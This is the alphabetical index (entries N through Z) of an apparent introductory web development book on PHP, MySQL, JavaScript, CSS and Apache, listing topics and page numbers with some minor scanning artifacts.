variables, 195 

navigator object, 214-215 
negating if statements, 332-333 
nesting 

foreach statements, 306 
if statements, 333 
queries, 503 

Net Panel, Firebug add-on, 267 

next statement, 303 

none list style, 144, 146-147 

Notepad, 97 

notices, 311, 313 

NULL data type, 288, 296 

number_format statement, 291

numbering of script lines, 311 

numbers 

comparing values in PHP, 321 
PHP validation of, 580-581 
working with in JavaScript, 196-197 
numeric data types 
arithmetic operations on, 289 
arithmetic operators, 290-291 
formatting numbers as dollar 
amounts, 291 

numerical data, storing, 482 

O


object data types, 288 
object-oriented programming (OOP). 
See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through, 539 
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 


functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 
objects 

choosing for OOP scripts, 401-402 
comparing, 421-422 
copying, 420-421 
creating, 208-209, 413 
creating and using in OOP scripts, 402 
destroying, 423-424 
getting information about, 422-423 
overview, 208, 398-399 
properties, adding to, 209-210 
offsite storage of database 
backups, 468 
<ol> tag, 103 
on() function, 255
OOP (object-oriented programming). 
See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through, 539
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 

functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 
open_basedir option, 428 
opendir statement, 370-372
opening files, modes for, 384 
opening tags, 91 
operating system commands 
backticks, 373-374 
error messages, accessing with, 
376-377 

exec function, 375-376 
overview, 372-373 
passthru function, 376 
security issues, 377-378 
system function, 374-375 
operating systems 
Linux 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache from source code
on, 27-28

installing MySQL from RPM files, 
61-62 

installing MySQL on, 20 
installing PHP on, 40-42, 44-45 
obtaining Apache for, 23-24 
obtaining MySQL for, 58-59 
obtaining PHP for, 37-38 
PHP, installing on, 20 
restarting Apache on, 30 
starting Apache on, 29-30 
starting MySQL on, 57 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
Macs 

activating MySQL support, 71-72 
Apache, installing on, 19 
backing up databases on, 469-471 


checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring Apache for PHP, 49 
controlling MySQL server, 67 
getting Apache information on, 31 
installing Apache on, 27-28 
installing MySQL from DMG files, 
62-63 

installing MySQL on, 20 
installing PHP on, 20, 42-45 
obtaining Apache for, 24 
obtaining MySQL for, 59 
obtaining PHP for, 38 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73 
Unix 

backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
getting Apache information on, 31 
installing PHP on, 40-42, 44-45 
obtaining MySQL for, 58-59 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
Windows 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 

controlling MySQL server, 66-67 
getting Apache information on, 31 
installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 

MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
operating systems, PHP tasks on 
exchanging data with other 
programs, 389-391 
file management, 365-369 
FTP, 378-383 

operating system commands, 
372-378 

organizing files, 369-372 
overview, 365 

reading and writing text files, 
383-389 

SQLite software, 394-395 
or, in comparisons, 327-329 
order, retrieving database data
in, 505

ORDER BY, SELECT queries, 505 
order for passing values to 
functions, 351 
ordered lists, 103, 104-105 
organizing 

data in databases, 477-480 
files with PHP functions, 369-372 
organizing PHP scripts 
display code, separating from logic
code, 357-358
with functions, 358-359 
with include files, 359-363 
overview, 357 
reusing code, 358 
outer joins, 510


P 


<p> tag, 95, 96 
padding, 143-144, 158 
Page class, 642-643 
page events, 241 
page layouts, CSS 
overview, 155 

single-column layout, creating, 
155-158 

two-column layout, creating, 
159-162 

paid access to websites, 587 
panels, enabling in Firebug 
add-on, 267 

parent classes, 400, 415-417 
parentheses 

using with arithmetic operators, 
290-291 

using with comparisons, 329 
parse errors, 311 
passing values to PHP functions 
number of, 351-352 
order of, 351 
overview, 349-350 
by reference, 353-354 
types of values, 350-351 
passthru function, 372, 376 
password recovery e-mail success 
page, 622-623 

password recovery pages, building, 
619-622 

password recovery process file, 
creating, 625-626 
password reset database, 
building, 619 

password reset pages, building, 
623-625 
passwords 

MySQL accounts, 461, 465-466 
PHP validation of, 582-584 
root account, 458 
pathinfo() function, 368
paths, changing in Apache, 33
pattern matching with regular 
expressions, 323-327 
percentages, font sizing by, 136-137 
periods (.), 132 
Perl-compatible regular 
expressions, 323 

permissions, MySQL accounts, 455 
.php extension, 272
PHP functions. See also specific 
functions by name 
built-in, 356 

code reuse through, 536-539 
creating, 347 
deprecated, 313 
disabling, 637-638 
error messages, 312 
file management, 365-369 
include files, placing in, 360 
for MySQL, 452 

organizing scripts with, 358-359 
overview, 319, 346 
passing values to, 349-354 
related to objects and classes, 
422-423 

returning values from, 354-356 
reusing code, 358 
for validation, 585-586 
variables, using in, 347-349 
for working with MySQL, 516 
PHP HyperText Preprocessor (PHP). 
See also data types; object- 
oriented programming 
Apache, securing, 426-427 
arrays 

$_SESSION, 438
creating, 296-297 
getting values from, 301-302 
holding multiple values in, 195 
for loops, 202-203 
multidimensional, 305-306 
overview, 288, 296 
reading files into, 388-389 


removing values from, 299 
sorting, 299-301 
viewing, 298-299 
walking through values in, 
302-305 

checking for installation, 36 
comments, adding to script, 
316-318 

configuring, 50-51, 83 
configuring for MySQL support, 71 
configuring web server for, 47-49 
constants, 287-288 
cookies, 438-440 
dates and times, 307-310 
displaying content on web pages, 
278-281 

error messages, 310-316 
file extensions, 19 
general discussion, 12-13, 271-273

helper functions, automatically 
including, 531-535 
installing, 20, 35, 40-46 
obtaining, 36-39 
OOP. See also classes 
abstract methods, 415-418 
classes, 398-399, 413-415 
code reuse through, 539 
comparing objects, 421-422 
copying objects, 420-421 
destroying objects, 423-424 
developing scripts, 400-402 
errors, handling with Exception 
class, 419-420 

functions related to objects and 
classes, 422-423 
inheritance, 400 
methods, 399-400 
objects, 398-399 
overview, 397-398 
preventing changes to classes or 
methods, 418 
properties, 399 

operating systems tasks 
exchanging data with other 
programs, 389-391 
file management, 365-369 
FTP, 378-383 

operating system commands, 
372-378 

organizing files, 369-372 
overview, 365 

reading and writing text files, 
383-389 

SQLite software, 394-395 
overview, 271, 531 
provided by web-hosting 
companies, 16 

registration-process pages, 598-602 
reusing code, 535-539 
sanitizing variables, 432-436 
securing servers, 425-426 
security options, setting in
php.ini, 428
sessions, 437-438, 440-446 
structure of, 273-275 
syntax, 275-277 
templates, 642-650 
testing, 51-52, 81-82 
troubleshooting connections with 
MySQL, 73-74 

troubleshooting installation of, 53 
unexpected input, handling, 
429-432 
validation 

of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
matching passwords, 582-584 
of numbers, 580-581 
overview, 574-576 
of radio buttons, 579-580 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 


variables 

assigning strings to, 292 
assigning values to, 282-283 
creating, 282-283 
displaying values in, 284-287 
naming, 282 
overview, 281 

removing information from, 283 
session, 437-438 
single versus double quotes 
with, 293 

testing content of, 322 
timestamps, assigning to, 309-310 
using in functions, 347-349 
variable, 283-284 
writing code, 277-278 
PHP scripts 

breaking out of loops, 344-346 
communicating with MySQL, 516-521 
conditional statements, 329-335 
conditions, setting up 
comparing values, 320-322 
joining multiple comparisons, 
327-329 
overview, 320 

pattern matching with regular 
expressions, 323-327 
testing variable content, 322 
display code, separating from logic
code, 357-358
do..while loops, 341-342
include files, organizing with, 
359-363 

infinite loops, avoiding, 343-344 
for loops, 335-339 
MySQL, working with, 515-516 
MySQL errors, handling, 522-523 
mysqli functions, 523-526 
mysqli functions, converting to 
mysql functions, 526-527 
organizing, 357 
overview, 319-320 
reusing code, 358 
selecting MySQL databases 
with, 521 

while loops, 338-341 
PHP tags, 273, 361 




PHP validation 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
matching passwords, 582-584 
of numbers, 580-581 
overview, 574-576 
of radio buttons, 579-580 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating,
585-586

PHP website, downloading from, 37 
php_value directive, 636 
phpinfo() output, 74
php.ini file

disabling functions and classes, 
637-638 

editing, 50-51, 53, 83 
error display, changing, 639 
file_uploads setting, 433
limiting file sizes in, 433 
location of, 83 

making changes outside of, 636 
overview, 635 

resource limits, changing, 639 
security options, setting in, 428 
session parameters, changing, 637 
session timeout, changing, 636-637 
troubleshooting PHP and MySQL 
connections, 73 
working with, 635 
phpMyAdmin utility, 24, 81 
pixels, font sizing by, 136-137 
plus sign (+), 196, 289, 290 
points, font sizing by, 136-137 
port used by Apache, changing, 32, 33 
POST method, 172, 173, 548 
postfix operator (i++), 201 
PostgreSQL databases, enabling 
support for, 45 
pound sign (#), 131, 173 
prefix=PREFIX option, PHP, 45
preg_match() function, 326-327, 430,
431, 553


prepended files, starting sessions with, 
532-534 

preventDefault() function, 246
previous statement, 303
primary key, 479, 491 
primary selectors, jQuery, 226 
print statements, 278-281, 284-285 
print_r statements, 286, 298 
private keyword, 404 
private properties and methods, 
407-409, 632 

privileges, MySQL accounts, 459, 
461-462, 463, 466-467 
process files, building, 625-628 
programs 

exchanging PHP data with other, 
389-391 

provided by web-hosting companies, 
17 

server-side, 12 
TextEdit, 97 
web server, 8 
properties 

$this variable, accessing with, 
404-405 

adding to objects, 209-210 
background-color, 147 
background-image, 150-154 
background-position, 153 
choosing for OOP scripts, 401-402 
clear, 157 
display, 160 
float, 160 

font-family, 134-135 
font-size, 136-137 
font-style, 126 
font-weight, 126 
isLoggedIn, 612-613, 614-618 
length, 202 
list-style-type, 144 
margin, 157, 158 
overview, 399 
private, 407-409 
property_exists, 422 
public, 407-409
setting for classes, 403-404
text-decoration, 167 
userAgent, 215-216
visibility, 161 
width, 157 

property_exists function, 422
protected keyword, 404 
protecting databases, 454-455 
protocol, HTTP, 8-9 
provideFeedback function, 566, 
569-570 

public keyword, 404 
public properties and methods, 
407-409 

Q 

queries, SQL 
building, 451-452 
to see account information, 464 
sending, 452-454 
querying PHP data types, 289 

R 


r mode, 384 
r+ mode, 384 

radio buttons, 170, 178-179, 431, 
579-580 

RDBMS (Relational Database 
Management System), 13, 450, 
477-480 

read mode, opening files in, 385 
readdir function, 370, 371 
reading 
CSV files, 391 

text files, with PHP, 387-390 
ready() function, 223-225, 241, 246
real numbers, 289-291 
redirecting to other pages, 216-217 
referencing 

image locations, 113-114 
passing values to functions by, 
353-354 

refining validation, 568-570 


register_globals setting, 428, 434 
registerUser function, 602 
registration pages 
creating, 593-596 
CSS, 597-598
JavaScript, 596-597 
registration-process PHP pages, 
598-602 

regular expressions, 323-327, 430, 579 
reinstalling XAMPP installation kit, 
84-85 

Relational Database Management 
System (RDBMS), 13, 450, 477-480 
relationships between database tables, 
creating, 480-481 
relative versus absolute links, 111
reliability of web-hosting 
companies, 16 
Remember icon, 3 
removeAttr () function, 259 
removeClass function, 239-240 
removeFeedback function, 566, 570 
removing 

information from PHP variables, 283 
MySQL accounts, 467-468 
tables from databases, 493 
values from arrays, 299 
rename statement, 369 
repeating background images, 154 
request verification, 459 
require statements, 360
require_once statements, 361 
required fields, PHP validation of, 
576-579 

Reset button, adding to web 
forms, 180 

reset process file, creating, 627-628 
reset statement, 303 
reset success pages, 625 
_resetPass method, 632 
resizing images, 114 
resource data types, 288 
resource limits, changing, 639 
restart command, 30 
restarting Apache, 29, 30 
restoring data from backups, 471-473 
results from functions, returning,
207-208 

retrieving data from databases 
combining data from separate tables, 
508-513 

overview, 502-503 
specific information, 503-504 
in specific orders, 505 
from specific rows, 505-508 
return keyword, 207 
return statement, 347, 354-356
returning 

results from functions, 207-208 
values from PHP functions, 354-356 
reusing PHP code, 358, 535-539 
REVOKE statement, 467
root account, 458 
root directory, 366 
root element, HTML documents, 92 
rows 

counting number affected by 
statements, 525 
counting number retrieved by 
queries, 523-524 
retrieving database data from, 
505-508 

RPM files, installing MySQL on Linux 
from, 61-62 
rsort function, 301 
rtrim function, 388 

S


s date format symbol, 309 
safe_mode option, 428
safe_mode_gid option, 428
sanitizing user input, 430 
<script> tag, 95, 189 
search engines, use of page titles, 93 
search function, 356 
security 
Apache, 14 

backing up databases, 468-471 
FTP, 378 

include files, 361-362 


MySQL, 454-455, 518 
operating system command issues, 
377-378 
security, PHP 
Apache, securing, 426-427 
overview, 425 

sanitizing variables, 432-436 
securing servers, 425-426 
setting in php.ini, 428
unexpected input, handling, 
429-432 

select boxes, adding to web forms, 
174-176 

SELECT privilege, 462 
SELECT query, 502-505, 508-513 
SELECT statement, 631 
selected attribute, 175, 176 
selecting elements with jQuery,
225-227 
selectors, CSS 

groups of elements as, 131-134 
individual elements as, 130-131 
overview, 128-129 
selecting HTML elements, 130 
selectors, jQuery, 225-227 
SELinux, 425 
semantic markup, 11, 95 
SERIAL data type, 484 
servers. See also web hosting 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 

installing PHP on Linux or Unix 
with, 41 

obtaining, 22-24 
overview, 8, 21, 273 
PHP compatibility with, 273
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 

testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
configuring for PHP, 47-49 
defined, 7 

FTP, logging in to, 379 

general discussion, 8-9 

HTML documents, storing on, 89-90 

installing, 25-28 

installing on local computers,
19-20

PHP files, processing of, 271-272 
securing, 425-426 
testing for, 21-22 
server-side programs, 12 
server-side validation, 555, 556 
Service check box, XAMPP Control 
Panel, 85 

servlet support, including, 45 
session cookies, 637 
session_destroy function, 446, 614
session_id function, 446 
session_name function, 446 
session_start() function,
440-441, 532

session_write_close()
function, 445
sessions 
closing, 445 
options for, 446 
overview, 437-438 
parameters, changing, 637 
prepended files, starting with, 
532-534 

session_write_close() 
function, 445 
starting, 440-445 
timeout, changing, 636-637 
SET PASSWORD statement, 466
set_time_limit() function, 639
setcookie() function, 438-439
setSession() function, 610 
setTimeout() function, 236


SHUTDOWN privilege, 462 
shutting down MySQL server, 67 
signatures 

abstract methods, 416 
MD5, 39 

simple statements, 276-277 
single line comments, 263 
single quote (’), 292 
single quotes (‘ ’), 285
single-column fixed-width layout, 
155-158 

single-column liquid layout, 157-158 
single-quoted strings, 292-294 
site maps, 163 
size 

of font, setting with CSS, 136-138 
of images, 114 
size attribute, 173 
software 

exchanging PHP data with other, 
389-391 

provided by web-hosting 
companies, 17 
server-side, 12 
TextEdit, 97 
web server, 8 
solid border style, 141 
sort function, 299-300, 301 
sorting arrays, 299-301 

source code

installing Apache from, 23-24, 27-28 
installing MySQL from, 63-65 
installing PHP from, 38 
output from PHP statements, 279 
spaces 

avoiding in filenames and URLs, 110 
inserting in pages, 99-101 
in SQL, 452 

<span> tag, 95, 126, 127 
special characters 
-, 324 
0, 324
(II), 324
?, 324
^, 324
{ , }, 324
changing in Apache, 33
converting to entities, 432 
escaping, 525-526 
used in patterns, 323-326 
specifying log files, 316 
speed of web-hosting companies, 17 
SQL (Structured Query Language), 
451 

queries, 451-454, 464 
SQL injection, 429-430 
statements, sending to MySQL, 519 
SQL injection, 429-430 
SQLite software, 394-395 
sqlite_query function, 394-395
square brackets ([ ]), 296 
square list style, 144 
src attribute, 113, 190, 234 
starting Apache, 29-30 
startingvalue statement, 336 
Startup Wizard, XAMPP, 76-78 
statements 
AddType, 47-48, 49 
beginning statements, in for 
loops, 337 

break, 334, 335, 344-346 
class, 402, 403 
complex, 276-277, 319 
continue, 344-346 
echo, 275-276, 278-281, 284-285, 
287, 298 

else section of if statements, 330 
elseif section of if 
statements, 330 
ending statements, in for 
loops, 338 

GRANT, 465, 466-467 
if statements, 277, 329, 330-333 
include, types of, 360 
include_once, 360-361 
print, 278-281, 284-285 
print_r, 286, 298 
require, 360 
require_once, 361 
simple, 276-277 
SQL, sending to MySQL, 519 


switch, 329, 333-335 
var_dump, 286-287, 289, 298 
statistics, provided by web-hosting 
companies, 17 
stopping Apache, 29, 30 
storage 

data types, 481-484 
of database backups, 468 
of include files, 361-362 
strict messages, 311, 313 
strings 

assigning to variables, 292 
comparing, 321 
defined, 288
double-quoted, 292-294 
joining, 294 

keeping track of words with, 
195-196 

overview, 288, 292 
reading files into, 389 
single-quoted, 292-294 
SQL queries, 452 
storing long, 295 
strtotime statement, 309-310
structure 

of databases, 494-495 
MySQL, 450 
of PHP, 273-275 
structure of HTML documents 
body section, 94 
head section, 92-93 
overview, 91-92 
root element, 92 
title elements, 93 
Structured Query Language (SQL) 
queries, 451-454, 464 
SQL injection, 429-430 
statements, sending to MySQL, 519 
<style> element, 127
style sheets 
external, 128-129 
internal, 126-128 
subclasses, 400 
subdomains, 9 

submit event handler, 242-246, 563 
submit() function, 246, 568-569
submit input type, 179 
submit type, 170 

submitting web forms, 179-180, 182 
subqueries, 503 
substr () function, 231 
subtraction, 197 

success pages, building, 602-607, 
622-623, 625 
SuExec, 426-427 
support for MySQL, 71-72 
suppressing single error 
messages, 315 

switch statements, 329, 333-335 
syntax, for mysql and mysqli functions, 
527 

syntax, PHP 

complex statements, 276-277 
overview, 275-276 
simple statements, 276-277 
system function, 372, 374-375, 377 
tab-delimited files, 391-393, 500

<table> tag, 103 

tables 

adding to databases, 491 
combining data from database, 
508-513 

creating relationships between 
database, 480-481 
database, 450 
HTML, 102-103, 105-108 
RDBMS, 477-480 
tables_priv table, 463 
tabs, in PHP code, 293 
tab-separated values (TSV) files, 
391-393 
tags 

<a>, 94, 108-109, 111-112 
anchor, 94, 108-109, 111-112 
<br>, 94, 99-100 
closing, 91 

<div>, 95, 96, 126, 127-128 


<fieldset>, 172 
<form>, 95, 170, 172-173 
<h1> through <h6>, 95, 96

HTML, 94-95, 103
<img>, 95, 113-114 
<input>, 95 

JavaScript, adding to pages, 189 
<label>, 172 
<legend>, 172 
<li>, 103 

<link>, 95, 128-129 
<ol>, 103 
opening, 91 

opening and closing, 91 
<p>, 95, 96 
PHP, 273, 361 
<script>, 95, 189 
<span>, 95, 126, 127 
<table>, 103 
<td>, 103 
<th>, 103 
<tr>, 103 
<ul>, 103 

tarballs, 27, 41, 43, 62, 64 
target attribute, 112 
targeting CSS styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
<td> tag, 103 
Technical Stuff icon, 3 
technical support of web-hosting 
companies, 17 
templates 

bottom of page, 646 
connecting top, middle, and bottom, 
646-650 

extending, 650-653 
general discussion, 641-642 
overview, 641 

template class, creating, 642-643 
top of page, 643-646 
testing

with conditionals, 197-200 
CSS across multiple browsers,
122-123 
MySQL, 68-69 
PHP, 51-52 

for unexpected input on forms, 
430-431 

variable content, 322 
for web servers, 21-22 
XAMPP installation kit, 79-82 
test.php file, 51-52
text 

changing with each() loops,
230-232 

fonts, styling with CSS 
color, setting, 138-140 
font family, setting, 134-136 
general discussion, 122-126 
overview, 11, 134 
size, setting, 136-138 
inserting in HTML pages, 95-96 
PHP validation of, 579 
text boxes 

counting characters in, 254-257 
creating, 254-255 

preventing character input, 257-259 
TEXT data type, 483 
text editors, 89, 97 
text files, PHP statements for 
accessing files, 384-386 
exchanging data in text files, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
text() function, 231
text inputs, adding to web forms, 
173-174 

text strings, 452 
text type, 170 

text-decoration CSS property, 167 
TextEdit program, 97 
<th> tag, 103 


throwing an exception, 419-420 
time data, storing, 482 
TIME data type, 483 
time zones, setting, 83, 307-308 
timeout value for sessions, 443, 
636-637 
times, 307-310 
timestamps, 307, 309-310 
Tip icon, 3 

title elements, HTML documents, 93 
TLD (Top-Level Domain), 9 
toggleClass function, 240 
tokens, 311 

top of page, in templates, 643-646 
Top-Level Domain (TLD), 9 
totalRemaining variable, 256 
<tr> tag, 103 
traversing arrays 
with foreach statement, 304-305 
manually, 303-304 
multidimensional arrays, 306 
overview, 302-303 
troubleshooting 
JavaScript programs 
alerts, 191-193, 262 
comments, 262-264 
Firebug add-on, 264-268 
overview, 261 
MySQL installation, 69-70 
PHP and MySQL connections, 73-74 
PHP installation, 53 
with var_dump statements, 286-287 
XAMPP installation kit, 85 
try block, 420 

TSV (tab-separated values) files, 
391-393 

turning off error messages, 313-314 
Twitter, 541 

two underscores (__), 407 

two-column fixed-width layout, 
159-161 

two-column liquid layout, 161-162 
type hinting, 406 
<ul> tag, 103 

undefined function error message, 

53, 73 

uninstalling XAMPP installation kit, 
84-85 

UNION query, 509-510 
Unix 

backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
getting Apache information on, 31 
installing PHP on, 40-42, 44-45 
obtaining MySQL for, 58-59 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
Unix timestamps, 307, 367, 368 
unlink statement, 369 
unordered lists, 103-104, 228 
UPDATE privilege, 462 
UPDATE statement, 513, 525 
updating 

database data, 513 
MySQL, 458 
upgrading MySQL, 473 
upload_max_filesize directive, 639 
uploading 

with FTP, 380-382, 434-436 
limiting file sizes in php.ini, 433 
preventing, to PHP, 433 
upper-roman list style, 144 
url_fopen setting, 434 
URLs 

opening PHP files through, 274 
PHP validation of, 582 
USAGE privilege, 462 
user accounts, MySQL 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 


overview, 462, 464 
passwords, 461, 465-466 
privileges, 461-462, 466-467 
removing, 467-468 
seeing information about, 464 
User class, building, 607-610 
user database for login applications 
accessing, 591 
building, 590-591 
designing, 589-590 
overview, 589 
user hijacking, 430 
User objects, creating, 607-611 
user table, 463 
userAgent property, 215-216 
usort function, 301 
utilities 
antivirus, 434 
apxs, 40, 42, 43, 44 
mysqladmin, 67 
mysqldump, 469 
phpMyAdmin, 24, 81 
yum, 23, 37 

V 


val() function, 246-247 
validateForm() function, 564, 
568-569 

validateReset() method, 630-631 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
feedback to form users, 565-568 
of files, 433-434 

form validation process, 555-556 
HTML, 116-119 

HTML and CSS on forms, reviewing, 
561-562 

matching passwords, 582-584 
of numbers, 580-581 
overview, 555, 574-576 
of radio buttons, 579-580 
refining, 568-570 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 

of web forms, 246-247 
validation functions, creating, 

585-586 

value attribute, 173-174 
values 

assigning to PHP variables, 282-283 
displaying in PHP variables, 284-287 
knowing how long variables 
hold, 286 

passing to PHP functions, 349-354 
removing from arrays, 299 
retrieving from arrays, 301-302 
returning from PHP functions, 
354-356 

walking through in arrays, 302-305 
var keyword, 193-194 
var_dump statements, 286-287, 

289, 298 

VARCHAR data type, 483 
variable variables, 283-284 
variables 
condition, 200 
holding data in, 193-195 
for loops, 200 
postfix operator (i++), 201 
sanitizing, 432-436 
variables, PHP 
assigning strings to, 292 
assigning values to, 282-283 
creating, 282-283 
displaying values in, 284-287 
naming, 282 
overview, 281 

removing information from, 283 
session, 437-438 
single versus double quotes 
with, 293 


testing content of, 322 
timestamps, assigning to, 
309-310 

using in functions, 347-349 
variable, 283-284 
verifying downloaded files, 24-25, 
39, 59 

versions of Apache, 22-23, 41, 42 
viewing arrays, 298-299 
virtual hosts, 427 
Virtual PC for Application 
Compatibility software, 
Microsoft, 122 

visibility CSS property, 161 
Visibone’s Color Lab, 138 

W 


w date format symbol, 309 
w mode, 384 
w+ mode, 384 

W3C Markup Validation Service, 
116-119 

walking through arrays, 302-305, 306 
with foreach statement, 304-305 
manually, 303-304 
multidimensional arrays, 306 
overview, 302-303 
WAMPServer installation kit, 24, 38 
Warning icon, 3 
warning messages, 311, 312 
web browsers 
defined, 7 

detecting with JavaScript, 214-216 
fonts, choosing web-friendly, 
138-140 

general discussion, 8 
JavaScript support, 188, 220 
on mobile devices, 10 
redirecting to other pages, 216-217 
testing CSS across multiple, 

122-123 
Web Fonts, 135 
web forms. See also validation 
aligning fields with CSS, 180-183 
blank fields, checking for, 246-247 
checkboxes, creating, 176-177 
clearing, 180 

counting characters in text boxes, 
254-257 

creating, 593-602 
creating with OOP, 414-415 
disabling form fields, 257-259 
drop-down boxes, adding, 174-176 
<form> tag, 172-173 
general discussion, 169-170 
input elements of, 170-172 
malicious attacks through, 429-432 
mouse click event handler, adding, 
247-251 
overview, 169 
radio buttons, 178-179 
submit event handler, adding, 
242-246 

submitting, 179-180 
text inputs, adding, 173-174 
unexpected input, handling, 
429-432 
web hosting 
choosing hosts, 14-15 
for company websites, 15-16 
hosted websites, using, 18-19 
overview, 14 

web-hosting companies, choosing, 
16-18 

web page languages 
CSS, 11 
HTML, 10-11 
JavaScript, 11-12 
overview, 10 
web pages 

block-level elements, 98 
body section, 94 
comments, 101-102 
creating, 97-98 

displaying PHP content on, 278-281 
head section, 92-93 
images, adding, 113-116 
inline elements, 98 


links, adding, 108-112 
lists, adding, 102-105 
overview, 7, 91-92 
root element, 92 
tables, 102-103, 105-108 
title elements, 93 
web server languages 
Apache httpd, 13-14 
MySQL, 12-13 
overview, 12 
PHP, 12-13 

web servers. See also web hosting 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 

installing PHP on Linux or Unix 
with, 41 

obtaining, 22-24 
overview, 8, 21, 273 
PHP compatibility with, 273 
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 
testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
configuring for PHP, 47-49 
defined, 7 

FTP, logging in to, 379 
general discussion, 8-9 
HTML documents, storing on, 89-90 
installing, 25-28 

installing on local computers, 19-20 
PHP files, processing of, 271-272 
securing, 425-426 
testing for, 21-22 
web services 
accepting input, 548-553 
general discussion, 541-542 
overview, 541 

returning data from databases, 
545-548 

returning dates from, 542-545 
web space, 81 
web-hosting companies 
choosing, 16-18 
overview, 15 
websites 

Apache, obtaining software from, 23 
authenticated pages, adding, 
612-618 

company websites, web hosting for, 
15-16 

confidentiality of, 587 
function files, creating, 591-593 
general discussion, 588 
hosted, 18-19 

login pages, building, 604-607 
MySQL, downloading software 
from, 58 

opening files in other, 386 
overview, 587 
paid access to, 587 
PHP, downloading from, 37 
success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
Welcome page, XAMPP, 80 
well-formed pages, 95 
WHERE clause of SELECT query, 505, 
506-508 

while loops, 203, 335, 338-341 
widgets, 188 

width CSS property, 157 
wildcards, in hostnames, 460-461 
Windows, Microsoft. See also XAMPP 
installation kit 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 


controlling MySQL server, 66-67 
getting Apache information on, 31 
installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 
MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
with-apxs=FILE option, PHP, 45 
with-apxs2=FILE option, PHP, 45 
with-config-filepath=DIR 
option, PHP, 45 

with-mysql=DIR option, PHP, 45 
with-mysqli=DIR option, PHP, 45 
with-oci8=DIR option, PHP, 45 
with-openssl=DIR option, PHP, 45 
with-oracle=DIR option, PHP, 45 
with-pgsql=DIR option, PHP, 45 
with-servlet=DIR option, PHP, 45 
Wordpad, 97 

write mode, opening files in, 385 
writing 

PHP code, 277-278 

to text files, with PHP, 386-387 
XAMPP installation kit 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
XAMPP web page 
language options, 80 
testing, 80 

testing phpMyAdmin utility from, 81 
XML (Extensible Markup Language), 
45, 541, 550-553 
xor, in comparisons, 327-329 
Zip files, PHP, 37, 46 
zlib option, configure 
command, 43 
Y date format symbol, 309 
yum utility, 23, 37 